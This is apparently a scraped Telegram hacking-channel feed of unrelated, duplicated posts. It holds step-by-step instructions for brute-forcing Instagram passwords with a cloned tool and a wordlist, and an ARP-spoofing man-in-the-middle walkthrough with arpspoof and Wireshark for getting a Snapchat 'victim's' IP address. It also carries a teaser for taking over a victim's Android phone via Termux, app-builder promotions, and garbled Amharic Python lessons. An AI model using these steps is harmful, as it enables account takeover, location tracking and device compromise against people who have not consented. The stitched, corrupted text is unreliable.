🔰2- ɴᴏᴡ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴄʟᴏɴᴇ ᴛʜᴇ ᴛᴏᴏʟs ᴛʜᴀᴛ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴜsᴇ. ᴛʏᴘᴇ:
> ᴄᴅ [ᴛʜᴇ ᴘᴀᴛʜ ᴡʜᴇʀᴇ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴅᴏ ᴛʜᴀᴛ]
> ɢɪᴛ ᴄʟᴏɴᴇ ʜᴛᴛᴘs: //ɢɪᴛʜᴜʙ. ᴄᴏᴍ/ᴇᴛʜɪᴄᴀʟ-ʜ4ᴄᴋ3ʀ/ɪɴsᴛᴀɢʀᴀᴍ (ᴅᴇʟᴇᴛᴇ ᴛʜᴇ sᴘᴀᴄᴇs)
> ᴄᴅ ɪɴsᴛᴀɢʀᴀᴍ
🔰3- ᴅᴏ ᴀ ʟs. ʏᴏᴜ ᴡɪʟʟ sᴇᴇ 3 ғɪʟᴇs/ᴅɪʀᴇᴄᴛᴏʀɪᴇs: "ᴄᴏʀᴇ", "ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ" ᴀɴᴅ ᴀɴᴏᴛʜᴇʀ ғɪʟᴇ. ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ɢɪᴠᴇ ᴘᴇʀᴍɪssɪᴏɴs ᴛᴏ ᴛʜᴇ ᴛᴏᴏʟ. ᴛʏᴘᴇ ɪɴ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ:
> ᴄʜᴍᴏᴅ +x ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ
🔰4- ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴀ ᴡᴏʀᴅʟɪsᴛ ғᴏʀ ᴘᴀssᴡᴏʀᴅs. ɪ ᴡɪʟʟ ɴᴏᴛ ᴇxᴘʟᴀɪɴ ʜᴏᴡ ᴛᴏ ᴅᴏ ᴛʜɪs ʙᴇᴄᴀᴜsᴇ ɪᴛ ɪs ᴄᴏᴍᴍᴏɴ sᴇɴsᴇ, ʙᴜᴛ ɪғ ʏᴏᴜ ʜᴀᴠᴇ ɴᴏ ɪᴅᴇᴀ ᴡʜᴇʀᴇ ᴛᴏ sᴛᴀʀᴛ ʏᴏᴜ ᴄᴀɴ ᴅᴏᴡɴʟᴏᴀᴅ ᴛᴏᴏʟs sᴜᴄʜ ᴀs "ᴄʀᴜɴᴄʜ" ᴏʀ "ᴄᴜᴘᴘ", ɪɴsᴛᴀʟʟ ᴛʜᴇᴍ ᴀɴᴅ ᴍᴀᴋᴇ ᴀ ᴍᴀɴ ᴏғ ᴛʜᴇsᴇ ᴘʀᴏɢʀᴀᴍs ᴛᴏ ʟᴇᴀʀɴ ʜᴏᴡ ᴛᴏ ᴜsᴇ ᴛʜᴇᴍ. ᴏɴᴄᴇ ᴡᴇ ʜᴀᴠᴇ ᴀ ғɪʟᴇ ᴡɪᴛʜ ᴛʜᴇ ʟɪsᴛ ᴏғ ᴘᴏssɪʙʟᴇ ᴘᴀssᴡᴏʀᴅs, ᴡᴇ ᴍᴏᴠᴇ ᴏɴ ᴛᴏ ᴛʜᴇ ɴᴇxᴛ sᴛᴇᴘ.
🔰5- ɴᴏᴡ, ᴡʜᴇɴ ᴡᴇ ʜᴀᴠᴇ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ, ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴏᴏʟ ᴡɪᴛʜ ᴛʜᴇ ɴᴇxᴛ sʏɴᴛᴀx:
> ᴘʏᴛʜᴏɴ ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ [ᴜsᴇʀɴᴀᴍᴇ] [ᴘᴀᴛʜ ᴛᴏ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ]
(ʀᴇᴍᴇᴍʙᴇʀ ᴛᴏ ᴅᴇʟᴇᴛᴇ ᴛʜᴇ ][ ᴡʜᴇɴ ʏᴏᴜ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴄᴏᴍᴍᴀɴᴅ)
🔰6- ᴡᴀɪᴛ ᴜɴᴛɪʟ ᴛʜᴇ ᴘʀᴏᴄᴇss ɪs ғɪɴɪsʜᴇᴅ. ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ʙʏ ɪᴛsᴇʟғ ᴡɪʟʟ ʙᴇ ᴄʜᴇᴄᴋɪɴɢ ᴛʜᴇ ᴅɪғғᴇʀᴇɴᴛ ᴄᴏᴍʙᴏs ᴀɴᴅ ᴡɪʟʟ ᴀssɪɢɴ ᴀ ᴘʀᴏxʏ ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ.
🔰7- ɪғ ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ғɪɴᴅs ᴛʜᴇ ᴘᴀssᴡᴏʀᴅ, ɪᴛ ᴡɪʟʟ ɴᴏᴛɪғʏ ʏᴏᴜ ᴀɴᴅ sʜᴏᴡ ʏᴏᴜ ɪᴛs ᴄᴏʀʀᴇsᴘᴏɴᴅɪɴɢ ᴘᴀssᴡᴏʀᴅ.
🔰How To Get IP Address Of Any Snapchat User🔰
👨💻Easy MITM Attack
📜Required:
- Mac OS X / Kali Linux ( Or Any UNIX )
- A Phone Where You Have Snapchat On ( Im Assuming Its A Phone )
- Nmap
- Some Tools And Little MITM Knowledge !
👨🏫Here Is The Tut:
🌀Download Wireshark Here
🌀Download Arpspoof Here - MACOS only - Kali Linux Has This Already!
1. Fire Up Terminal And Ip Forward Your Laptop/pc With This Scripts:
Kali - sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Mac - sudo sysctl -w net.inet.ip.forwarding=1
2. Find Your Phone Device Local Ip And Write It Down.
Nmap -sn <gateway ip>/24
Ex. nmap -sn (or -sP) 192.168.0.1/24
3. Spoof Your Phone.
arpspoof -i <interface> -t <phone ip> gateway
Ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1
4. Fire up wireshark and filter On Your Phone Ip With Stun Protocol
ip.addr == <phone ip> && stun
Ex: ip.addr == 192.168.0.160 && stun
5. Call Your Victim On Snap And Keep Calling Him For Around 5 Seconds.
🌀They Do Not Need Necessary To Answer
You Will See On Wireshark Some Binding Requests, Then Some Other Stun Ones.
👨💻Easy MITM Attack
📜Required:
- Mac OS X / Kali Linux ( Or Any UNIX )
- A Phone Where You Have Snapchat On ( Im Assuming Its A Phone )
- Nmap
- Some Tools And Little MITM Knowledge !
👨🏫Here Is The Tut:
🌀Download Wireshark Here
🌀Download Arpspoof Here - MACOS only - Kali Linux Has This Already!
1. Fire Up Terminal And Ip Forward Your Laptop/pc With This Scripts:
Kali - sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Mac - sudo sysctl -w net.inet.ip.forwarding=1
2. Find Your Phone Device Local Ip And Write It Down.
Nmap -sn <gateway ip>/24
Ex. nmap -sn (or -sP) 192.168.0.1/24
3. Spoof Your Phone.
arpspoof -i <interface> -t <phone ip> gateway
Ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1
4. Fire up wireshark and filter On Your Phone Ip With Stun Protocol
ip.addr == <phone ip> && stun
Ex: ip.addr == 192.168.0.160 && stun
5. Call Your Victim On Snap And Keep Calling Him For Around 5 Seconds.
🌀They Do Not Need Necessary To Answer
You Will See On Wireshark Some Binding Requests, Then Some Other Stun Ones.
🔰How to change Computer Password without knowing current Password🔰
◾️ Steps :👇
1. Right click on My Computer/This Pc.
2. Click on Manage.
3. Click on local users and group.
4. Double Click on Users,
Right Click on User Name which you want to change the password.
5. Input user name.
6. Click on Set Password .
7. Click on Proceed.
8. Enter you new Password.
9. Conform you New Password.
10. Click on Ok.
11. Again Click on Ok.
12. Now your job is done.
NOTE: In step 5 User Name belongs to the Name of that Computer User. So this is the actual trick that you changed the old password without knowing what was the old Password.
◾️ Steps :👇
1. Right click on My Computer/This Pc.
2. Click on Manage.
3. Click on local users and group.
4. Double Click on Users,
Right Click on User Name which you want to change the password.
5. Input user name.
6. Click on Set Password .
7. Click on Proceed.
8. Enter you new Password.
9. Conform you New Password.
10. Click on Ok.
11. Again Click on Ok.
12. Now your job is done.
NOTE: In step 5 User Name belongs to the Name of that Computer User. So this is the actual trick that you changed the old password without knowing what was the old Password.
♨️HOW TO HACK AND GAIN FULL ACCESS ON VICTIM'S DEVICE USING TERMUX
🌀In this article you will learn to hack social media accounts using termux and how to gain full access on victim's phone.
• Battery Status
• SMS Inbox read
• SMS Send
• Telephony Device Info
• Toast
• TTS Engine in Android
• TTS Speak
• Vibrate the Phone
• Wi-Fi Connection Info
• Wi-Fi Scan Info
• Camera Info
• Camera Photo
• Clipboard Set
• Contact List
• Download file with Android
• Download Manager
• Location via GPS
• Mobile Network or Wi-Fi
• Notification
https://telegra.ph/How-to-hack-victims-device-using-termux-08-09
🌀In this article you will learn to hack social media accounts using termux and how to gain full access on victim's phone.
• Battery Status
• SMS Inbox read
• SMS Send
• Telephony Device Info
• Toast
• TTS Engine in Android
• TTS Speak
• Vibrate the Phone
• Wi-Fi Connection Info
• Wi-Fi Scan Info
• Camera Info
• Camera Photo
• Clipboard Set
• Contact List
• Download file with Android
• Download Manager
• Location via GPS
• Mobile Network or Wi-Fi
• Notification
https://telegra.ph/How-to-hack-victims-device-using-termux-08-09
Telegraph
How to hack victim's device using termux?
Full access on victim's device Following Option, You Can Use Through Termux App to Hack Any Android Device Battery Status SMS Inbox read SMS Send Telephony Device Info Toast TTS Engine in Android TTS Speak Vibrate the Phone Wi-Fi Connection Info Wi-Fi…
🔰How To Create Android Apps Without Coding🔰
🌀These are the best sites for android application making without any coding :
#1 AppsGeyser :
AppsGeyser is a FREE service that converts your content into an App and makes your money. Your app will have all you need including messaging, social sharing, tabs and full support for HTML5 enhancements. But forget about the app, Apps geyser helps you to build a business and profit from mobile!
#2 Appypie :
Appy Pie is the fastest growing cloud based Mobile Apps Builder Software (App Maker) that allows users with no programming skills, to create Android and iPhone applications for mobiles and smartphones.
#3 Buzztouch :
Buzztouch is an open source “app engine” that powers tens of thousands of iPhone, iPad, and Android applications. Buzztouch is used in conjunction with the iOS and Androidsoftware developer kits (SDK’s).
#4 Appyet :
Using AppYet, anyone can create a professional Android app. There’s no programming knowledge required, only take a few minutes to build your first app.
#5 Appclay :
AppClay , conceived and created by core development experts at ShepHertz Technologies, is an esteemed intuitive interface that enables each one of us- become an App developer effortlessly without any coding, software installation, maintenance and financial investment.
Share and Support ♥️
➖ @The_unknown_hat➖
🌀These are the best sites for android application making without any coding :
#1 AppsGeyser :
AppsGeyser is a FREE service that converts your content into an App and makes your money. Your app will have all you need including messaging, social sharing, tabs and full support for HTML5 enhancements. But forget about the app, Apps geyser helps you to build a business and profit from mobile!
#2 Appypie :
Appy Pie is the fastest growing cloud based Mobile Apps Builder Software (App Maker) that allows users with no programming skills, to create Android and iPhone applications for mobiles and smartphones.
#3 Buzztouch :
Buzztouch is an open source “app engine” that powers tens of thousands of iPhone, iPad, and Android applications. Buzztouch is used in conjunction with the iOS and Androidsoftware developer kits (SDK’s).
#4 Appyet :
Using AppYet, anyone can create a professional Android app. There’s no programming knowledge required, only take a few minutes to build your first app.
#5 Appclay :
AppClay , conceived and created by core development experts at ShepHertz Technologies, is an esteemed intuitive interface that enables each one of us- become an App developer effortlessly without any coding, software installation, maintenance and financial investment.
Share and Support ♥️
➖ @The_unknown_hat➖
This media is not supported in your browser
VIEW IN TELEGRAM
how to make a payload
Payload, in simple terms, are simple scripts that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.
For educational purpose only or INSA is going to bust my ass for this tutorial💀💀
Payload, in simple terms, are simple scripts that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.
For educational purpose only or INSA is going to bust my ass for this tutorial💀💀
This media is not supported in your browser
VIEW IN TELEGRAM
how to send anonymous messages
# ውድድር
# ክፍል_1
የእርስዎ የመጀመሪያ ፕሮግራም
"ሄሎ ዓለም!" የሚል አጭር ፕሮግራም በመፍጠር እንጀምር ፡፡
በፒቶን ውስጥ ጽሑፍን ለማውጣት የህትመት መግለጫውን እንጠቀማለን ፡፡
ፒክራምን በመጠቀም የበታች ትዕዛዙን ለማተም ይሞክሩ እና በተግባር ይመልከቱት:
አትም ("hello world")
እኛ ለዛሬ በቂ ነው በፒቶን እንቀጥላለን
# reር ያድርጉ
@ethio_techzone
# ክፍል_1
የእርስዎ የመጀመሪያ ፕሮግራም
"ሄሎ ዓለም!" የሚል አጭር ፕሮግራም በመፍጠር እንጀምር ፡፡
በፒቶን ውስጥ ጽሑፍን ለማውጣት የህትመት መግለጫውን እንጠቀማለን ፡፡
ፒክራምን በመጠቀም የበታች ትዕዛዙን ለማተም ይሞክሩ እና በተግባር ይመልከቱት:
አትም ("hello world")
እኛ ለዛሬ በቂ ነው በፒቶን እንቀጥላለን
# reር ያድርጉ
@ethio_techzone
#ክፍል 2
ፓይዘን
ጽሑፍ ማተም
የህትመት መግለጫው በርካታ የጽሑፍ መስመሮችን ለማውጣት ሊያገለግል ይችላል ፡፡
ለምሳሌ:
ማተሚያ ('hello world!')
ማተሚያ ('hello world!')
ማተሚያ ('አይፈለጌ መልእክት እና እንቁላል ...')
#ማስታወሻ
የፒቲን ኮድ ብዙውን ጊዜ ለሞቲክ ፓይቲን አስቂኝ ቡድን ማጣቀሻዎችን ይ containsል ፡፡ ለዚህም ነው “አይፈለጌ መልእክት” እና “እንቁላል” የሚሉት ቃላት ብዙውን ጊዜ “foo” እና “አሞሌ” በሌሎች የፕሮግራም ቋንቋዎች ውስጥ በሚጠቀሙባቸው በፓይዘን ውስጥ እንደ የቦታ ማስያዥያ ተለዋዋጮች የሚጠቀሙበት ፡፡
እያንዳንዱ የህትመት መግለጫ ጽሑፍ ከአዲስ መስመር ያወጣል ፡፡
# reር ያድርጉ
@ethio_techzone
ፓይዘን
ጽሑፍ ማተም
የህትመት መግለጫው በርካታ የጽሑፍ መስመሮችን ለማውጣት ሊያገለግል ይችላል ፡፡
ለምሳሌ:
ማተሚያ ('hello world!')
ማተሚያ ('hello world!')
ማተሚያ ('አይፈለጌ መልእክት እና እንቁላል ...')
#ማስታወሻ
የፒቲን ኮድ ብዙውን ጊዜ ለሞቲክ ፓይቲን አስቂኝ ቡድን ማጣቀሻዎችን ይ containsል ፡፡ ለዚህም ነው “አይፈለጌ መልእክት” እና “እንቁላል” የሚሉት ቃላት ብዙውን ጊዜ “foo” እና “አሞሌ” በሌሎች የፕሮግራም ቋንቋዎች ውስጥ በሚጠቀሙባቸው በፓይዘን ውስጥ እንደ የቦታ ማስያዥያ ተለዋዋጮች የሚጠቀሙበት ፡፡
እያንዳንዱ የህትመት መግለጫ ጽሑፍ ከአዲስ መስመር ያወጣል ፡፡
# reር ያድርጉ
@ethio_techzone